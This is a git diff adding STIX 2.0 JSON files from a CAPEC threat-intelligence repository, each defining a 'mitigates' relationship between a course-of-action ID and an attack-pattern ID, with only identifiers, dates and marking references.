b/capec/relationship/relationship--287e77a8-6932-4aaf-89fb-fb8430c7fcf0.json new file mode 100644 index 0000000000..07f2edddcd --- /dev/null +++ b/capec/relationship/relationship--287e77a8-6932-4aaf-89fb-fb8430c7fcf0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5c6d7ac8-bfbc-44ca-91f0-190698789cc2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--287e77a8-6932-4aaf-89fb-fb8430c7fcf0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--52eb1f45-37ca-4bae-980d-8358d067e7fc", + "target_ref": "attack-pattern--4d39083a-01db-4b17-a4b8-25037eb51560", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2880a858-4b3b-40dc-9a58-44e0b4f8555d.json b/capec/relationship/relationship--2880a858-4b3b-40dc-9a58-44e0b4f8555d.json new file mode 100644 index 0000000000..a48ed85903 --- /dev/null +++ b/capec/relationship/relationship--2880a858-4b3b-40dc-9a58-44e0b4f8555d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--766c9616-6d6b-45d7-8e9d-45c2271a8e5d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2880a858-4b3b-40dc-9a58-44e0b4f8555d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2786b040-a5e9-4b8f-9fe9-e8fbd043985e", + "target_ref": "attack-pattern--e372df87-d117-476a-907d-0372310c2414", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--28956a76-3892-41c8-90e0-d027d1d65c4f.json b/capec/relationship/relationship--28956a76-3892-41c8-90e0-d027d1d65c4f.json new file mode 100644 index 0000000000..3ea6bdcf60 --- /dev/null +++ b/capec/relationship/relationship--28956a76-3892-41c8-90e0-d027d1d65c4f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b27d5655-d098-4132-8dae-4915840b95d5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--28956a76-3892-41c8-90e0-d027d1d65c4f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7195cb36-22ea-4d06-93e2-5ce46840220b", + "target_ref": "attack-pattern--2d50280d-8c0c-46e3-9397-c46d577cff93", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--28cccf5a-d4bd-4d55-88da-2ca4d583c1a2.json b/capec/relationship/relationship--28cccf5a-d4bd-4d55-88da-2ca4d583c1a2.json new file mode 100644 index 0000000000..66dd06b69a --- /dev/null +++ b/capec/relationship/relationship--28cccf5a-d4bd-4d55-88da-2ca4d583c1a2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--648e4982-618a-4af4-8ab7-aaf279c57e85", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--28cccf5a-d4bd-4d55-88da-2ca4d583c1a2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b6e32f66-ed14-40e2-90b7-ac4b07e8b60f", + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2927ef8c-7d8b-427f-af4c-7dfc72351f9f.json b/capec/relationship/relationship--2927ef8c-7d8b-427f-af4c-7dfc72351f9f.json new file mode 100644 index 0000000000..f052ce2abc --- /dev/null +++ b/capec/relationship/relationship--2927ef8c-7d8b-427f-af4c-7dfc72351f9f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0d9591fa-2d9d-4e95-8187-a0c51cb3fcce", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2927ef8c-7d8b-427f-af4c-7dfc72351f9f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--13872a21-011c-46a9-a2b3-e68f5b91dd65", + "target_ref": "attack-pattern--66352194-a1a9-4654-bb38-ae96b0bb824a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2a99063d-6087-4919-b051-c9f383e23a58.json b/capec/relationship/relationship--2a99063d-6087-4919-b051-c9f383e23a58.json new file mode 100644 index 0000000000..c3d64e54d7 --- /dev/null +++ b/capec/relationship/relationship--2a99063d-6087-4919-b051-c9f383e23a58.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--64b8a55e-862e-42e5-a1f7-6335f2d9ea2c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2a99063d-6087-4919-b051-c9f383e23a58", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "target_ref": "attack-pattern--fce1eeb4-1761-4fba-a388-f45b968adf5a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2b0be4a8-baeb-4275-becd-c395fb0d1fa0.json b/capec/relationship/relationship--2b0be4a8-baeb-4275-becd-c395fb0d1fa0.json new file mode 100644 index 0000000000..960278bbad --- /dev/null +++ b/capec/relationship/relationship--2b0be4a8-baeb-4275-becd-c395fb0d1fa0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3f3324dc-50b2-4795-91f5-676e15a628fe", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2b0be4a8-baeb-4275-becd-c395fb0d1fa0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a0f8efa-951a-4a7f-b072-8dd89b09a288", + "target_ref": "attack-pattern--5ba0f3bc-bb81-4f9f-a848-de3d6ab1b085", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2b95a8fd-34cc-488e-b836-7fd91b9e7738.json b/capec/relationship/relationship--2b95a8fd-34cc-488e-b836-7fd91b9e7738.json new file mode 100644 index 0000000000..2e59344e62 --- /dev/null +++ b/capec/relationship/relationship--2b95a8fd-34cc-488e-b836-7fd91b9e7738.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7b8f3b7d-0f6a-49f5-b832-8564ebdec828", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2b95a8fd-34cc-488e-b836-7fd91b9e7738", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2c9420b0-57bf-42b8-9620-4fcd3498da62.json b/capec/relationship/relationship--2c9420b0-57bf-42b8-9620-4fcd3498da62.json new file mode 100644 index 0000000000..d13983e73e --- /dev/null +++ b/capec/relationship/relationship--2c9420b0-57bf-42b8-9620-4fcd3498da62.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--62ca8b50-d067-4fdc-a1c9-766d4a7dabff", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2c9420b0-57bf-42b8-9620-4fcd3498da62", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--033ebb89-b975-4cc6-8853-269cb21cd704", + "target_ref": "attack-pattern--2e72ce44-c580-471c-a9ac-6e6a600b67b2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2d065a75-e47c-434f-81a2-8b53ac78a555.json b/capec/relationship/relationship--2d065a75-e47c-434f-81a2-8b53ac78a555.json new file mode 100644 index 0000000000..df4c389b08 --- /dev/null +++ b/capec/relationship/relationship--2d065a75-e47c-434f-81a2-8b53ac78a555.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6da258db-7f33-4bf2-a0d6-a79f2608c895", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2d065a75-e47c-434f-81a2-8b53ac78a555", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb3f9c77-2496-47fd-ba75-584b9bcf5b65", + "target_ref": "attack-pattern--8e9a80d8-2017-4faa-b83a-8c5b91beead4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2d2380c2-85b1-4b31-a175-301f5d739afb.json b/capec/relationship/relationship--2d2380c2-85b1-4b31-a175-301f5d739afb.json new file mode 100644 index 0000000000..8c3b1aca1b --- /dev/null +++ b/capec/relationship/relationship--2d2380c2-85b1-4b31-a175-301f5d739afb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--865795dd-9ac6-41b7-a5c6-d0672b012b9b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2d2380c2-85b1-4b31-a175-301f5d739afb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8903cc8e-8523-4ecc-898f-e840944d8343", + "target_ref": "attack-pattern--0db28437-bbb7-4654-afda-e51ac1c18f74", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2d6b779f-9f4b-48c6-8122-a6f2bb2507c8.json b/capec/relationship/relationship--2d6b779f-9f4b-48c6-8122-a6f2bb2507c8.json new file mode 100644 index 0000000000..ad6fb87f20 --- /dev/null +++ b/capec/relationship/relationship--2d6b779f-9f4b-48c6-8122-a6f2bb2507c8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--687ad0c1-c758-4c59-ba55-d6c9c4da69fb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2d6b779f-9f4b-48c6-8122-a6f2bb2507c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb78da5d-7bd7-458a-93ba-a2f7c782a1af", + "target_ref": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2d8bc8db-1af3-4c2a-bf80-b1f189f03c7d.json b/capec/relationship/relationship--2d8bc8db-1af3-4c2a-bf80-b1f189f03c7d.json new file mode 100644 index 0000000000..c80f515cae --- /dev/null +++ b/capec/relationship/relationship--2d8bc8db-1af3-4c2a-bf80-b1f189f03c7d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e1a70b3d-6d2a-41de-94b9-65bb5dea3ee3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2d8bc8db-1af3-4c2a-bf80-b1f189f03c7d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f4f9fc31-4e41-47f7-b94f-c648d10e1167", + "target_ref": "attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2ec2d107-0a46-4c1a-8a24-39430c2fa965.json b/capec/relationship/relationship--2ec2d107-0a46-4c1a-8a24-39430c2fa965.json new file mode 100644 index 0000000000..725b3739e5 --- /dev/null +++ b/capec/relationship/relationship--2ec2d107-0a46-4c1a-8a24-39430c2fa965.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--229db3c8-8de8-4362-8ddf-03d0a05ef9bf", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2ec2d107-0a46-4c1a-8a24-39430c2fa965", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1", + "target_ref": "attack-pattern--f933e0a9-328c-4b49-ad26-c2442a24a3c3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2ef87cd6-21d3-43ef-8fff-8bd608da5fd3.json b/capec/relationship/relationship--2ef87cd6-21d3-43ef-8fff-8bd608da5fd3.json new file mode 100644 index 0000000000..6539992733 --- /dev/null +++ b/capec/relationship/relationship--2ef87cd6-21d3-43ef-8fff-8bd608da5fd3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1c6066e8-fc8a-421e-9218-496c00fca868", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2ef87cd6-21d3-43ef-8fff-8bd608da5fd3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f823d9a4-e666-403c-b92f-6533f8fc992d", + "target_ref": "attack-pattern--b44beaa2-63aa-4cbc-b46e-62fd6ea708c5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2f16d009-dec7-4cb5-a028-0060e59bee3d.json b/capec/relationship/relationship--2f16d009-dec7-4cb5-a028-0060e59bee3d.json new file mode 100644 index 0000000000..880fe429bf --- /dev/null +++ b/capec/relationship/relationship--2f16d009-dec7-4cb5-a028-0060e59bee3d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6dfd46c3-d3d3-4322-aeb4-274af6a760bd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2f16d009-dec7-4cb5-a028-0060e59bee3d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--666a0b8c-b596-4acf-a365-fc65d2731747", + "target_ref": "attack-pattern--59634590-4269-4742-896f-27e5a8f3acc4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2f80e922-6445-4cef-a0fd-3cee4349662e.json b/capec/relationship/relationship--2f80e922-6445-4cef-a0fd-3cee4349662e.json new file mode 100644 index 0000000000..38fbcb1776 --- /dev/null +++ b/capec/relationship/relationship--2f80e922-6445-4cef-a0fd-3cee4349662e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2058d85b-2e68-426e-a6a5-8d120b11d815", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2f80e922-6445-4cef-a0fd-3cee4349662e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a6c13cf6-959b-44ed-913f-7c10efe1c648", + "target_ref": "attack-pattern--c9cacee8-0f24-4a36-8245-d1db21932188", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2f83a558-1c50-4163-8ee4-5dfdc15a7f9c.json b/capec/relationship/relationship--2f83a558-1c50-4163-8ee4-5dfdc15a7f9c.json new file mode 100644 index 0000000000..98c1d29ff8 --- /dev/null +++ b/capec/relationship/relationship--2f83a558-1c50-4163-8ee4-5dfdc15a7f9c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--793bbb1f-0922-462f-b685-d2cfd1e79490", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2f83a558-1c50-4163-8ee4-5dfdc15a7f9c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--832091a4-e08f-4034-bb49-5c7f60cb32cf", + "target_ref": "attack-pattern--fb1ce762-688f-4564-bcaf-533020ef079c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--2fd4f7b0-9f82-4bf5-97ee-aee0f01263a6.json b/capec/relationship/relationship--2fd4f7b0-9f82-4bf5-97ee-aee0f01263a6.json new file mode 100644 index 0000000000..1c9740c411 --- /dev/null +++ b/capec/relationship/relationship--2fd4f7b0-9f82-4bf5-97ee-aee0f01263a6.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--445f1f25-07fc-4794-861e-0f17976403b0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--2fd4f7b0-9f82-4bf5-97ee-aee0f01263a6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0d6a011b-a753-49c9-9e5d-1a8a67c60cf5", + "target_ref": "attack-pattern--9e2a4e9f-633b-433e-a854-2705c5df916f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3050a257-2430-4ad9-a747-b6f45af0416f.json b/capec/relationship/relationship--3050a257-2430-4ad9-a747-b6f45af0416f.json new file mode 100644 index 0000000000..010375eddd --- /dev/null +++ b/capec/relationship/relationship--3050a257-2430-4ad9-a747-b6f45af0416f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4eb5f262-1b46-4c41-a252-1c81fb5d6aaa", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3050a257-2430-4ad9-a747-b6f45af0416f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe3ebc18-c3f2-4cc8-8740-7059cbd69c4c", + "target_ref": "attack-pattern--289251fd-9402-48a7-aee0-28b8ba2b3e41", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--30cca37e-cc03-4f7a-862c-c007d7ff7153.json b/capec/relationship/relationship--30cca37e-cc03-4f7a-862c-c007d7ff7153.json new file mode 100644 index 0000000000..8d1287fbad --- /dev/null +++ b/capec/relationship/relationship--30cca37e-cc03-4f7a-862c-c007d7ff7153.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--52b7323c-0c1a-48af-81d3-2ff688d1eddb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--30cca37e-cc03-4f7a-862c-c007d7ff7153", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6593210b-d532-485d-8aad-22672f5f04a2", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3154d4bf-605f-494e-b940-0922a96cba1e.json b/capec/relationship/relationship--3154d4bf-605f-494e-b940-0922a96cba1e.json new file mode 100644 index 0000000000..1b21b6044b --- /dev/null +++ b/capec/relationship/relationship--3154d4bf-605f-494e-b940-0922a96cba1e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--18b829dd-6c6b-4996-8668-505ed812927d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3154d4bf-605f-494e-b940-0922a96cba1e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", + "target_ref": "attack-pattern--4185a203-2337-4000-aeaa-e701fd4779f5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--31c0ce8e-9d50-4d93-a92c-e57c243f2496.json b/capec/relationship/relationship--31c0ce8e-9d50-4d93-a92c-e57c243f2496.json new file mode 100644 index 0000000000..20df150ec7 --- /dev/null +++ b/capec/relationship/relationship--31c0ce8e-9d50-4d93-a92c-e57c243f2496.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c828bbcf-eac7-44ff-a012-36a7e14722bc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--31c0ce8e-9d50-4d93-a92c-e57c243f2496", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--724cd67d-adc8-4f12-a881-cd350980aec9", + "target_ref": "attack-pattern--3104aa23-1c15-4c4c-9a97-3af74f5e3f67", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--32443837-429a-488d-b2e1-0d00e309e10c.json b/capec/relationship/relationship--32443837-429a-488d-b2e1-0d00e309e10c.json new file mode 100644 index 0000000000..cb268e9c84 --- /dev/null +++ b/capec/relationship/relationship--32443837-429a-488d-b2e1-0d00e309e10c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a19000db-7b4b-444a-8674-4d8c886ab5e2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--32443837-429a-488d-b2e1-0d00e309e10c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--50a35813-bde4-45f3-a4b7-d78ab0fb815e", + "target_ref": "attack-pattern--11c647fb-33fc-444c-b578-617cb2205def", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--324d5558-538a-42e4-8dc7-00f3f0b83837.json b/capec/relationship/relationship--324d5558-538a-42e4-8dc7-00f3f0b83837.json new file mode 100644 index 0000000000..3667bbefd3 --- /dev/null +++ b/capec/relationship/relationship--324d5558-538a-42e4-8dc7-00f3f0b83837.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2f929609-ecea-4252-8bc2-14ce7fb6fd8b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--324d5558-538a-42e4-8dc7-00f3f0b83837", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e41036ac-078e-45d9-ad72-811abfa1f31b", + "target_ref": "attack-pattern--cf470563-971d-489e-a0cc-07ef4a7c9e8a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--32daa3f9-f58d-4e4d-8d3b-7e513b3889e0.json b/capec/relationship/relationship--32daa3f9-f58d-4e4d-8d3b-7e513b3889e0.json new file mode 100644 index 0000000000..86316cb259 --- /dev/null +++ b/capec/relationship/relationship--32daa3f9-f58d-4e4d-8d3b-7e513b3889e0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ae9316d8-2df8-49ca-909a-9b38b9c62c0c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--32daa3f9-f58d-4e4d-8d3b-7e513b3889e0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2c6dd98d-3862-41ea-a343-97517e8c78fb", + "target_ref": "attack-pattern--ce52b42b-d355-43fb-92f9-ce114cd3cfdf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3327631e-c3c1-46cc-a867-cedd139c58a0.json b/capec/relationship/relationship--3327631e-c3c1-46cc-a867-cedd139c58a0.json new file mode 100644 index 0000000000..a655f351ae --- /dev/null +++ b/capec/relationship/relationship--3327631e-c3c1-46cc-a867-cedd139c58a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c955d518-3eee-4863-b589-56a994078404", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3327631e-c3c1-46cc-a867-cedd139c58a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d5c9990e-fec4-4e5e-a4bd-07a832e34a43", + "target_ref": "attack-pattern--4a2bd25a-02bc-4716-86e7-6ea7494b9c82", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--3373eabb-6268-44c7-855e-7ee2c75a486b.json b/capec/relationship/relationship--3373eabb-6268-44c7-855e-7ee2c75a486b.json new file mode 100644 index 0000000000..308cb7a177 --- /dev/null +++ b/capec/relationship/relationship--3373eabb-6268-44c7-855e-7ee2c75a486b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--51bc113e-50de-4b3f-8205-d52e36c64d51", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--3373eabb-6268-44c7-855e-7ee2c75a486b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", + "target_ref": "attack-pattern--1937802e-f880-445a-8a94-d07225d60d2a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] 